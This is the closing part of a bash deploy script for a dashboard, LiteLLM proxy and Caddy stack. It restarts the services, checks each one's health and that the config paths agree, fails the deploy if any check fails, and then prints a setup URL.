    if ! sudo -A systemctl is-active --quiet clawnex-litellm.service; then
        echo "  ✗ clawnex-litellm restart issued but unit not active."
        sudo -A journalctl -u clawnex-litellm.service -n 30 --no-pager 2>/dev/null || true
        exit 1
    fi
    echo "  ✓ clawnex-litellm restarted and active"
fi

sudo -A systemctl restart clawnex-dashboard.service
sleep 5

# --- 8/8 health + url -------------------------------------------------------
# 2026-05-08: expanded from dashboard-only to all three services after operator
# caught a clawnex-litellm restart-loop on internal-test-host while I'd already declared
# "deploy complete" based on the dashboard /api/health alone. Per
# feedback_verify_all_services_after_deploy.md: every deploy success
# requires dashboard + LiteLLM + Caddy all green.
echo "=== 8/8 health + url ==="
HEALTH_LB=$(curl -s --max-time 5 -o /dev/null -w '%{http_code}' http://127.0.0.1:5001/api/health 2>/dev/null)
HEALTH_HTTPS=$(curl -sk --resolve "${DOMAIN}:443:127.0.0.1" --max-time 10 -o /dev/null -w '%{http_code}' "https://${DOMAIN}/api/health" 2>/dev/null)
HEALTH_PUBLIC=$(curl -s --max-time 10 -o /dev/null -w '%{http_code}' "https://${DOMAIN}/api/health" 2>/dev/null)
AUTH=$(curl -sk --resolve "${DOMAIN}:443:127.0.0.1" --max-time 8 "https://${DOMAIN}/api/auth/status" 2>/dev/null)
CERT_ISSUER=$(echo | openssl s_client -servername "${DOMAIN}" -connect 127.0.0.1:443 2>/dev/null | openssl x509 -noout -issuer 2>/dev/null)

# LiteLLM proxy on :4001 — only checked when the unit was installed (skipped
# when there's no litellm/config.yaml, in which case the unit-install block
# above also skipped). systemctl gives us the service-level verdict; curl
# /health gives us the application-level verdict.
LITELLM_ACTIVE="not-installed"
LITELLM_HEALTH="-"
if systemctl list-unit-files clawnex-litellm.service 2>/dev/null | grep -q clawnex-litellm; then
  LITELLM_ACTIVE=$(systemctl is-active clawnex-litellm.service 2>/dev/null || echo "inactive")
  LITELLM_HEALTH=$(curl -s --max-time 5 -o /dev/null -w '%{http_code}' http://127.0.0.1:4001/health 2>/dev/null)
fi

# Caddy on :443 — service active + actually bound. Loopback :443 might fail
# if Caddy bound only to a Tailscale interface (internal-test-host pattern), so we accept
# either loopback success OR a listener seen on :443.
CADDY_ACTIVE=$(systemctl is-active caddy 2>/dev/null || echo "inactive")
CADDY_443=$(ss -tln 2>/dev/null | awk '{print $4}' | grep -E ':443$' | head -1)

# Tidy /tmp leftovers
rm -f /tmp/cnx-bundle.tar.gz 2>/dev/null || true

# Config-path truth check — internal reviewer 2026-05-09 required follow-up. The
# dashboard writes config.yaml via path.join(process.cwd(), ...) which
# in standalone mode resolves to .next/standalone/litellm/config.yaml.
# The systemd LiteLLM unit reads $HOME/clawnex/litellm/config.yaml.
# Both paths must resolve to the same inode (deploy-prod.sh symlinks
# them) — otherwise sync writes to an orphan file and LiteLLM never
# sees the updated config (the chronic "fixed but still degraded"
# bug class). This assertion locks the contract per-deploy.
DASH_CFG=$(readlink -f "$HOME/clawnex/.next/standalone/litellm/config.yaml" 2>/dev/null || echo "MISSING")
LL_CFG=$(readlink -f "$HOME/clawnex/litellm/config.yaml" 2>/dev/null || echo "MISSING")
LL_EXEC=$(systemctl show clawnex-litellm.service -p ExecStart --value 2>/dev/null | grep -oE -- "--config [^ ]+" | awk '{print $2}' || echo "")
LL_EXEC_RESOLVED=""
if [ -n "$LL_EXEC" ]; then LL_EXEC_RESOLVED=$(readlink -f "$LL_EXEC" 2>/dev/null || echo "MISSING"); fi
CONFIG_PATH_OK=1
if [ "$DASH_CFG" = "MISSING" ] || [ "$LL_CFG" = "MISSING" ] || [ "$DASH_CFG" != "$LL_CFG" ]; then CONFIG_PATH_OK=0; fi
if [ -n "$LL_EXEC_RESOLVED" ] && [ "$LL_EXEC_RESOLVED" != "MISSING" ] && [ "$LL_EXEC_RESOLVED" != "$LL_CFG" ]; then CONFIG_PATH_OK=0; fi

echo
echo "loopback http  /api/health  : ${HEALTH_LB}"
echo "loopback https /api/health  : ${HEALTH_HTTPS}"
echo "public   https /api/health  : ${HEALTH_PUBLIC}"
echo "auth status                 : ${AUTH}"
echo "cert issuer                 : ${CERT_ISSUER}"
echo "litellm service             : ${LITELLM_ACTIVE}"
echo "litellm /health             : ${LITELLM_HEALTH}"
echo "caddy service               : ${CADDY_ACTIVE}"
echo "caddy listening on          : ${CADDY_443:-none}"
echo "config path (litellm read)  : ${LL_CFG}"
echo "config path (dashboard wrt) : ${DASH_CFG}"
echo "config path (unit ExecStart): ${LL_EXEC_RESOLVED:-not-installed}"
echo

# Exit non-zero if any required service failed. Each gate emits its own
# failure line so the operator sees exactly what's wrong before bailing.
DEPLOY_OK=1
if [ "$HEALTH_LB" != "200" ]; then
  echo "✗ dashboard loopback /api/health returned ${HEALTH_LB} — check journalctl -u clawnex-dashboard"
  DEPLOY_OK=0
fi
if [ "$LITELLM_ACTIVE" = "active" ] && [ "$LITELLM_HEALTH" != "200" ]; then
  # Service says active but /health didn't answer — middle-state, surface it.
  echo "✗ litellm service active but /health returned ${LITELLM_HEALTH} — check journalctl -u clawnex-litellm"
  DEPLOY_OK=0
fi
if [ "$LITELLM_ACTIVE" != "active" ] && [ "$LITELLM_ACTIVE" != "not-installed" ]; then
  echo "✗ litellm service is ${LITELLM_ACTIVE} — check journalctl -u clawnex-litellm"
  DEPLOY_OK=0
fi
if [ "$CADDY_ACTIVE" != "active" ]; then
  echo "✗ caddy service is ${CADDY_ACTIVE} — check journalctl -u caddy"
  DEPLOY_OK=0
fi
if [ -z "$CADDY_443" ]; then
  echo "✗ caddy is not listening on :443 — check /etc/caddy/Caddyfile and journalctl -u caddy"
  DEPLOY_OK=0
fi
if [ "$CONFIG_PATH_OK" != "1" ]; then
  echo "✗ config path mismatch — dashboard writes and litellm reads do not resolve to the same file"
  echo "    dashboard:    $DASH_CFG"
  echo "    litellm read: $LL_CFG"
  echo "    unit Exec:    ${LL_EXEC_RESOLVED:-not-installed}"
  echo "    Symlink standalone/litellm → ../../litellm should be in place; check deploy-prod.sh."
  DEPLOY_OK=0
fi
if [ "$DEPLOY_OK" != "1" ]; then
  exit 1
fi

echo

echo ">>> SETUP URL <<<"
echo "  https://${DOMAIN}/setup?secret=${SETUP_SECRET}"
REMOTE_SCRIPT

REMOTE_RC=$?
[ "$REMOTE_RC" = "0" ] || die "remote deploy failed (rc=$REMOTE_RC)" 3

# ---------------------------------------------------------------------------
# Final summary
# ---------------------------------------------------------------------------

echo
ok "deploy complete: ${VERSION} on https://${DOMAIN}"
echo
